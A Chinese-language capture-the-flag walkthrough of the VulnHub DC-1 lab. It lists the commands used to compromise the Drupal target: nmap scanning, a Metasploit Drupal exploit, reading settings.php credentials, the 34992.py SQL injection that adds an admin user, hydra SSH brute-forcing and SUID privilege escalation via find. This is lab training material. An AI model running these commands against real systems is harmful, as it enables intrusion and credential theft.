目录
DC-1靶场机
官网下载 https://download.vulnhub.com/dc/DC-1.zip
下载完成后 用虚拟机打开文件
提示导入失败,直接点重试,导入完成后,打开DC-1虚拟机并等待,过程中别点进虚拟机里面
通过配置之后
确保DC-1 和kali处在同一网段下
下面开始渗透实战
1.主机发现
arp-scan -l
通过对比mac地址 确认目标靶机IP为192.168.20.138
2.端口探测
nmap -sV -p- 192.168.20.138
-sV 扫描目标主机端口上运行的软件信息
-p- 扫描全部端口0-65535
3.网页信息探测
80端口提供http服务 是突破口 用浏览器访问看一下
192.168.20.138:80
用whatweb 查看站点信息
whatweb -v 192.168.20.138
扫出CMS信息 CMS为Drupal
总结得到如下信息
CMS是Drupal
Apache 2.2.22
PHP 5.4.45
jQuery 1.4.4
4.敏感目录扫描
dirsearch -u 192.168.20.138 -e *
暂时未找到可以利用的信息
5.漏洞查找和利用
知道CMS之后 可以去寻找相对应的漏洞 百度一下Drupal漏洞
还是有很多漏洞的
漏洞查找
直接上Metasploit
msfconsole
查找一下Drupal的漏洞
有很多漏洞 这里我选择2018年的漏洞 时间较新 等级也高
漏洞利用
选择漏洞 进入
查看该漏洞参数模块
Current Setting是目前设置的内容
Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置
上面RHOSTS需要set,但是没有内容
设置RHOSTS
检查
设置完毕 run开始攻击
攻击成功
6.获取shell
(1)获取普通shell
(2)ls查看
发现有个flag1.txt文件 尝试查看
提示说需要配置文件
继续深入探测
获取交互式shell
以普通用户登录
python -c 'import pty;pty.spawn("/bin/bash")'
查看有无flag文件
发现只有一个flag1 打开却需要配置文件
继续深入探测
根据之前的提示看一下配置文件,配置文件有一些重要信息,有时候还能提权
百度Drupal配置文件,名字叫settings.php
find / -name settings.php
找到配置文件后 打开文件
cat /var/www/sites/default/settings.php
发现flag2 和一个数据库登录的账户和密码
flag2并没有发现我们想要的
7.数据库方向渗透
用拿到的账户密码登录数据库
成功登录数据库
看库
show databases;
看表
use drupaldb;show tables;
查看可疑的表 users
看列
select * from users;
发现密码被加密了 暂时调转方向
8.利用漏洞添加admin权限用户
drupal在7.0版本有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具
searchsploit drupal
查看脚本路径
searchsploit 34992.py -p
通过URL下载脚本 保存到桌面
新建窗口运行脚本
python2 34992.py -t http://192.168.20.138/node?destination=node -u flag3 -p 123456
admin用户创建成功
登录之后查看信息
查看flag3信息
提示passwd文件和shadow文件有可疑信息
查看passwd文件 tac /etc/passwd
发现flag4用户
我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码
9.九头蛇密码爆破
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.20.138
ssh连接
ssh flag@192.168.20.138
查看flag4文件
提示说用相同手法爆破其他flag 去考虑提权
10.SUID提权
root权限文件查看
find / -perm -4000 2>/dev/null
用可以执行root权限的find命令找查文件 来做到SUID提权
关于SUID提权:https://www.freebuf.com/articles/web/272617.html
find / -name index.php -exec "/bin/sh" \;
whoami 查看是否提权成功
直接进入root根目录 查看最终flag
成功通关!!!